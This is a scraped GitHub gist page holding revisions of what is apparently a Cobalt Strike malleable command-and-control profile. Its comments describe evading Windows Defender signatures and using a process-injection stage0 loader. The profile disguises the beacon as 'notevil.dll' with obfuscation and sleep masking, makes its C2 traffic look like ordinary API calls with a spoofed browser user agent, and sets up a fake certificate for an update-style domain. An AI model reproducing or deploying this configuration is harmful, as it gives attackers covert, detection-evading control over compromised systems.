-
-
Save deltaclock/fe44319460b0a8e784e09cd65c433ddc to your computer and use it in GitHub Desktop.
Revisions
-
tothi revised this gist
Dec 26, 2021 . 2 changed files with 66 additions and 38 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,66 @@ # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) # as stage0, remote injecting a thread into a suspended process works set host_stage "false"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; set sleeptime "10000"; stage { set allocator "MapViewOfFile"; set name "notevil.dll"; set obfuscate "true"; set sleep_mask "true"; # if omitted, Defender catches the 1st connect back as Behavior:Win32/CobaltStrike.[EH]!sms } http-get { set uri "/apiv8/getStatus"; client { header "X-Client" "notevil"; # for nginx redirector metadata { base64; header "Cookie"; } } server { output { print; } } } http-post { set uri "/apiv8/updateConfig"; client { header "X-Client" "notevil"; # for nginx redirector id { base64url; parameter "key"; } output { print; } } server { output { print; } } } https-certificate { set C "US"; set CN "update.secureapp9.com"; set O "netsecurity"; set OU "Certificate Authority"; set validity "365"; } This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,38 +0,0 @@ -
Dec 26, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,38 @@ http-get { set uri "/apiv8/getStatus"; client { metadata { base64; header "Cookie"; } } server { output { print; } } } http-post { set uri "/apiv8/updateConfig"; client { id { base64url; parameter "key"; } output { print; } } server { output { print; } } }